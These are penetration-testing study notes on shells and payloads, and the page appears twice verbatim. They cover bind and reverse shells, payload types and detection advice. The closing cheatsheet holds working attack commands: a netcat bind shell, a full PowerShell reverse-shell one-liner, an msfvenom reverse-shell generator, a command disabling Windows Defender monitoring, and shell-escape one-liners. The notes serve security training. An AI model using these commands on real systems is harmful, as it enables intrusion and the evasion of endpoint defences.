Shells & Payloads

Introduction

A shell (e.g., Bash, Zsh, CMD, PowerShell) is a program that lets users enter commands and view text output. It gives you direct access to the operating system—essential for enumeration, file transfers, privilege escalation, and persistence.
To interact with a shell, you use a terminal emulator (e.g., GNOME Terminal, PuTTY). The command language interpreter (or shell) processes your input and sends commands to the OS. Knowing which shell is running (often indicated by a prompt like $) helps determine what commands you can use.

Shell Types

There are two shell types:
Bind Shell: The target opens a listening port that you connect
- A listener must already be running.
- Firewalls and NAT may block incoming connections.
Reverse Shell: The target connects back to your listener, which is often preferred because outbound connections are less likely to be blocked. Tip: Use common ports (e.g., 443) to bypass outbound firewall restrictions.

Payloads & One-Liner

Payloads: Code designed to exploit a vulnerability to gain a shell or execute commands. They can come in many forms from small one-liners to full-featured scripts.
Metasploit Payloads:
- Staged Payloads: Send a small initial payload that downloads additional components.
- Stageless Payloads: Send the entire payload at once; useful when bandwidth is limited or stealth is crucial.

Host Identification & Payload Options

The payload we should use will be dependent on the operating system type.
There are multiple ways to identify an operating system:
- TTL Values: A ping response with a TTL around 128 often indicates a Windows host.
- Nmap OS Detection: Use Nmap to identify the target’s operating system.
Common Windows Payload Types:
- DLLs: Dynamic libraries that can be hijacked or injected to run code as SYSTEM.
- Batch Files (.bat): Simple DOS scripts for automating commands.
- VBScript (VBS): Lightweight scripting used in client-side automation.
- MSI Files: Windows Installer packages that can be crafted to execute payloads.
- PowerShell Scripts: Highly versatile; use .NET objects and cmdlets for advanced tasks.
CMD vs. PowerShell:
- CMD: Basic, text-only shell suitable for simple commands; leaves little trace.
- PowerShell: More powerful, supports advanced scripting and .NET objects; ideal when you need extended functionality, but might leave a more noticeable trail.

Spawning Interactive & Web Shells

Sometimes, you may only get a non-interactive (non-TTY) shell that lacks a proper prompt or full command support. This happens when there is no shell interpreter language defined in the environment variables associated with the user. There are multiple ways to conver these to interactive shells using Python, Ruby, Perl, etc.
Web shells allow you to execute commands on a server via a web browser. Popular sources for pre-made web shells include:
- Laudanum
- Pentestmonkey

Detection and Prevention

Monitoring

Effective monitoring is key to detecting active shells, payload delivery, and attempts to subvert defenses. Some critical events to watch for include:
- File Uploads: Monitor application logs for unexpected file uploads. Web applications are common targets for shell uploads, so use firewalls and antivirus to add extra layers of protection.
- Suspicious Non-Admin User Actions: Unusual commands from regular users—such as repetitive use of whoami or accessing uncommon network shares—may indicate compromise. Enable comprehensive logging (e.g., PowerShell logging) to track shell usage.
- Anomalous Network Sessions: Analyze NetFlow data to spot unusual patterns such as:
  - Heartbeats on nonstandard ports (e.g., 4444, often used by Meterpreter).
  - Abnormal remote login attempts.
  - Bulk GET/POST requests in a short time frame.

Establish Network Visibility

Maintain detailed documentation and visual network topology diagrams to track devices, data flow, and traffic patterns. Tools like NetBrain or even Draw.io can help create interactive maps that integrate with remote management systems. Many network vendors (e.g., Cisco Meraki, Ubiquiti, Check Point, Palo Alto Networks) now offer cloud-based dashboards with Layer 7 visibility for real-time monitoring. Establishing a baseline of normal traffic makes deviations easier to detect and respond to.

Protecting End Devices

Antivirus/Endpoint Protection: Keep antivirus software (e.g., Windows Defender) enabled and updated.
Patch Management: Implement a robust patch management strategy to ensure timely updates and vulnerability remediation.

Command Cheatsheet

env # Display environment variables to determine the active shell

sudo nc -lvnp <port> # Start a netcat listener on a specified port

nc -nv <listener_ip> <port> # Connect to a netcat listener at the specified IP and port

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <Listener-IP> <Port> > /tmp/f # Bind a shell via netcat

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<Listener-IP>',<Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" # PowerShell one-liner for reverse shell connection

Set-MpPreference -DisableRealtimeMonitoring $true # Disable real-time monitoring in Windows Defender

shell # Drop into a system shell from a Meterpreter session

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Attacker-IP> LPORT=<Port> -f <ext> > <Filename.ext> # Generate Linux reverse shell payload

python -c 'import pty; pty.spawn("/bin/sh")' # Spawn an interactive shell via Python

/bin/sh -i # Spawn an interactive shell

perl -e 'exec "/bin/sh";' # Spawn an interactive shell via Perl

ruby -e 'exec "/bin/sh"' # Spawn an interactive shell via Ruby

lua -e "os.execute('/bin/sh')" # Spawn an interactive shell via Lua

awk 'BEGIN {system("/bin/sh")}' # Spawn an interactive shell via awk

find / -name <nameoffile> -exec /bin/awk 'BEGIN {system("/bin/sh")}' \; # Spawn an interactive shell via find & awk

find . -exec /bin/sh \; -quit # Alternative method to spawn an interactive shell using find

vim -c ':!/bin/sh' # Spawn an interactive shell via Vim

PreviousWeb Information Gathering NextExploitation & Lateral Movement

Last updated 3 months ago

Shells & Payloads

Introduction

A shell (e.g., Bash, Zsh, CMD, PowerShell) is a program that lets users enter commands and view text output. It gives you direct access to the operating system—essential for enumeration, file transfers, privilege escalation, and persistence.
To interact with a shell, you use a terminal emulator (e.g., GNOME Terminal, PuTTY). The command language interpreter (or shell) processes your input and sends commands to the OS. Knowing which shell is running (often indicated by a prompt like $) helps determine what commands you can use.

Shell Types

There are two shell types:
Bind Shell: The target opens a listening port that you connect
- A listener must already be running.
- Firewalls and NAT may block incoming connections.
Reverse Shell: The target connects back to your listener, which is often preferred because outbound connections are less likely to be blocked. Tip: Use common ports (e.g., 443) to bypass outbound firewall restrictions.

Payloads & One-Liner

Payloads: Code designed to exploit a vulnerability to gain a shell or execute commands. They can come in many forms from small one-liners to full-featured scripts.
Metasploit Payloads:
- Staged Payloads: Send a small initial payload that downloads additional components.
- Stageless Payloads: Send the entire payload at once; useful when bandwidth is limited or stealth is crucial.

Host Identification & Payload Options

The payload we should use will be dependent on the operating system type.
There are multiple ways to identify an operating system:
- TTL Values: A ping response with a TTL around 128 often indicates a Windows host.
- Nmap OS Detection: Use Nmap to identify the target’s operating system.
Common Windows Payload Types:
- DLLs: Dynamic libraries that can be hijacked or injected to run code as SYSTEM.
- Batch Files (.bat): Simple DOS scripts for automating commands.
- VBScript (VBS): Lightweight scripting used in client-side automation.
- MSI Files: Windows Installer packages that can be crafted to execute payloads.
- PowerShell Scripts: Highly versatile; use .NET objects and cmdlets for advanced tasks.
CMD vs. PowerShell:
- CMD: Basic, text-only shell suitable for simple commands; leaves little trace.
- PowerShell: More powerful, supports advanced scripting and .NET objects; ideal when you need extended functionality, but might leave a more noticeable trail.

Spawning Interactive & Web Shells

Sometimes, you may only get a non-interactive (non-TTY) shell that lacks a proper prompt or full command support. This happens when there is no shell interpreter language defined in the environment variables associated with the user. There are multiple ways to conver these to interactive shells using Python, Ruby, Perl, etc.
Web shells allow you to execute commands on a server via a web browser. Popular sources for pre-made web shells include:
- Laudanum
- Pentestmonkey

Detection and Prevention

Monitoring

Effective monitoring is key to detecting active shells, payload delivery, and attempts to subvert defenses. Some critical events to watch for include:
- File Uploads: Monitor application logs for unexpected file uploads. Web applications are common targets for shell uploads, so use firewalls and antivirus to add extra layers of protection.
- Suspicious Non-Admin User Actions: Unusual commands from regular users—such as repetitive use of whoami or accessing uncommon network shares—may indicate compromise. Enable comprehensive logging (e.g., PowerShell logging) to track shell usage.
- Anomalous Network Sessions: Analyze NetFlow data to spot unusual patterns such as:
  - Heartbeats on nonstandard ports (e.g., 4444, often used by Meterpreter).
  - Abnormal remote login attempts.
  - Bulk GET/POST requests in a short time frame.

Establish Network Visibility

Maintain detailed documentation and visual network topology diagrams to track devices, data flow, and traffic patterns. Tools like NetBrain or even Draw.io can help create interactive maps that integrate with remote management systems. Many network vendors (e.g., Cisco Meraki, Ubiquiti, Check Point, Palo Alto Networks) now offer cloud-based dashboards with Layer 7 visibility for real-time monitoring. Establishing a baseline of normal traffic makes deviations easier to detect and respond to.

Protecting End Devices

Antivirus/Endpoint Protection: Keep antivirus software (e.g., Windows Defender) enabled and updated.
Patch Management: Implement a robust patch management strategy to ensure timely updates and vulnerability remediation.

Command Cheatsheet

env # Display environment variables to determine the active shell

sudo nc -lvnp <port> # Start a netcat listener on a specified port

nc -nv <listener_ip> <port> # Connect to a netcat listener at the specified IP and port

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <Listener-IP> <Port> > /tmp/f # Bind a shell via netcat

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<Listener-IP>',<Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" # PowerShell one-liner for reverse shell connection

Set-MpPreference -DisableRealtimeMonitoring $true # Disable real-time monitoring in Windows Defender

shell # Drop into a system shell from a Meterpreter session

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Attacker-IP> LPORT=<Port> -f <ext> > <Filename.ext> # Generate Linux reverse shell payload

python -c 'import pty; pty.spawn("/bin/sh")' # Spawn an interactive shell via Python

/bin/sh -i # Spawn an interactive shell

perl -e 'exec "/bin/sh";' # Spawn an interactive shell via Perl

ruby -e 'exec "/bin/sh"' # Spawn an interactive shell via Ruby

lua -e "os.execute('/bin/sh')" # Spawn an interactive shell via Lua

awk 'BEGIN {system("/bin/sh")}' # Spawn an interactive shell via awk

find / -name <nameoffile> -exec /bin/awk 'BEGIN {system("/bin/sh")}' \; # Spawn an interactive shell via find & awk

find . -exec /bin/sh \; -quit # Alternative method to spawn an interactive shell using find

vim -c ':!/bin/sh' # Spawn an interactive shell via Vim

PreviousWeb Information Gathering NextExploitation & Lateral Movement

Last updated 3 months ago